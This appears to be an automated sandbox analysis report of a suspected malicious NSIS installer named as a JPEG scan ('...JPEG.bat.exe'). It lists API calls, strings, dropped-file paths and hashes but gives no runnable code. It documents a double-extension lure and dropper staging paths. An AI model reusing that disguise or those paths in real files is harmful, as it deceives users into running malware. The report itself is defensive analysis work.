Opcode Fuzzy Hash: fdd1c6f164d69bb04a2db118324e420eee4596cf25755c9c8f65584aa60a0941
Instruction Fuzzy Hash: 3B61D5B1744200BED720BF659D45F2B3AACEB4475AB40447EF941B22E2C67C9D069A2E

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,00000400), ref: 00402D90

Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00402DDC

Strings

"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00402D63
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
Null, xrefs: 00402E5A
Inst, xrefs: 00402E48
soft, xrefs: 00402E51
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
Error launching installer, xrefs: 00402DB3

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2131262596
Opcode ID: 4402c1a628421308b32cd0359e52fb618b8350017d4aa0aaea4d42cf6b84a165
Instruction ID: 2e32d7aad0b4ca297083aa7498b96cb894cc3d31802a5233eda7db803f364c93
Opcode Fuzzy Hash: 4402c1a628421308b32cd0359e52fb618b8350017d4aa0aaea4d42cf6b84a165
Instruction Fuzzy Hash: CB51D6B1900215ABDB219F65DE89B9F7AB8EB04365F10403BF904B62D1C7BC9E418B9D

Function 00405F8C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B7
GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000), ref: 004060CA
SHGetSpecialFolderLocation.SHELL32(004050C9,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000), ref: 00406106
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406114
CoTaskMemFree.OLE32(00000000), ref: 00406120
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406144
lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,004050C9,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,00000000,0040E8C0,00000000), ref: 00406196

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406086
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040613E
Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll, xrefs: 00405FB1
Call, xrefs: 00405FB6, 00406083, 00406084, 00406085, 004060A1, 004060B6, 004060C9, 004060E5, 00406110, 00406143, 00406149, 00406161, 00406174, 0040618F, 00406195, 0040619D, 004061C7

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1221309604
Opcode ID: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
Instruction ID: 60a0f59e8b6b1cd7b12ffa89f816090d794fd0a29963f433d7893304f5ec962b
Opcode Fuzzy Hash: fabf967f770454fcc69e8c0a52ac2f68008736219b33d49b2524f3e131f746b9
Instruction Fuzzy Hash: 9D61F171A00111AEDF219F24CC95BBB3BA5DB45300F16813BE943BA2D2C23C49A2CB5E

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77

Part of subcall function 00405091: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsm54DF.tmp, xrefs: 004017A3, 00401812, 00401830
Call, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp$C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers$Call
API String ID: 1941528284-530941355
Opcode ID: 598ecc7f31e43cc8286b2ac0d52d053a057aa8c3f9718e2fb031b9a51df1fded
Instruction ID: ccd8e90e53bd547ce555faf0a88c0b4db7f619f01c1663a473e2e99c851a8e73
Opcode Fuzzy Hash: 598ecc7f31e43cc8286b2ac0d52d053a057aa8c3f9718e2fb031b9a51df1fded
Instruction Fuzzy Hash: D841A571A04516BECF107BB5CC45DAF76A8EF45369B20823BF521F20E1C77C8A418A6D

Function 00405091 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll, xrefs: 004050B1, 004050C3, 004050C9, 004050EC, 004050F8

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll
API String ID: 2531174081-2402085922
Opcode ID: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
Instruction ID: f15a229f4800e2d3be0f1ca7c95b874ac348c5f245d1a9f1eaef2b17b8141df3
Opcode Fuzzy Hash: aecfa0fe9eb69d515e305a3f612982ae456e6964b8eee712a8e2a2356c55715c
Instruction Fuzzy Hash: 67217A71E00518BADF119FA5CD84ADFBFA9EB05354F14807AF904AA291C6789E418FA8

Function 00405557 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A
GetLastError.KERNEL32 ref: 004055AE
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055C3
GetLastError.KERNEL32 ref: 004055CD

Strings

ds@, xrefs: 0040558C
C:\Users\user\AppData\Local\Temp\, xrefs: 0040557D
ts@, xrefs: 0040555D
C:\Users\user\Desktop, xrefs: 00405557

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-2230009264
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 3d8c07b43999b23b4b99d6b0442eda675a509ebc6c38f8f9f8ea4228a2b68225
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: 0D010871C04259EAEF019BA1CC447EFBFB9EF04354F10817AD905B6290E378A604CBAA

Function 00406294 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
wsprintfA.USER32 ref: 004062E4
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F8

Strings

%s%s.dll, xrefs: 004062DE
UXTHEME, xrefs: 0040629D
\, xrefs: 004062BC

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: b350a7b34e5dfe1d1a07fade029f1484d0e2916aa38c44d12689a48c44b66a33
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: FAF0F63091410AAADF15AB74DC0DFFB365CAB08304F1405BAB646E11D2E6B8E9288B69

Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402FFA
GetTickCount.KERNEL32 ref: 0040307B
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030A8
wsprintfA.USER32 ref: 004030B8

Strings

... %d%%, xrefs: 004030B2

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: c82de60818243e465859c967a3516e6db8ce76542d84b6bf7e6dfb16085b7dab
Instruction ID: 5f1f0f90ab52480f624b15d228fda7616e1eaa7d5f1d5864c66c4d16daa58cb3
Opcode Fuzzy Hash: c82de60818243e465859c967a3516e6db8ce76542d84b6bf7e6dfb16085b7dab
Instruction Fuzzy Hash: 69518271901219ABCF10DF65DA4469F7BB8AB08756F14413BF910BB2C0C7389E51CBAA

Function 00405B32 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B46
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B60

Strings

"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00405B32
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B35
nsa, xrefs: 00405B3D

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-768624884
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: 47ad9e4c3b070603f63866c15a94f77f10573a77d4085d28ed577f0a2abf86d9
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: FFF089367082086BD7104F55DC04B9B7BA8DF91750F10803BFA049A191D6B4B9548B59

Function 6DDA16DF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CEB
Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CF0
Part of subcall function 6DDA1A9C: GlobalFree.KERNEL32(?), ref: 6DDA1CF5

GlobalFree.KERNEL32(00000000), ref: 6DDA178A
FreeLibrary.KERNEL32(?), ref: 6DDA180D
GlobalFree.KERNEL32(00000000), ref: 6DDA1832

Part of subcall function 6DDA2273: GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA22A4

Part of subcall function 6DDA2676: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6DDA175B,00000000), ref: 6DDA2746

Part of subcall function 6DDA156B: lstrcpyA.KERNEL32(?,6DDA4010,00000000,6DDA1568,?,00000000,6DDA16B7,00000000), ref: 6DDA1581

Strings

, xrefs: 6DDA1813

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

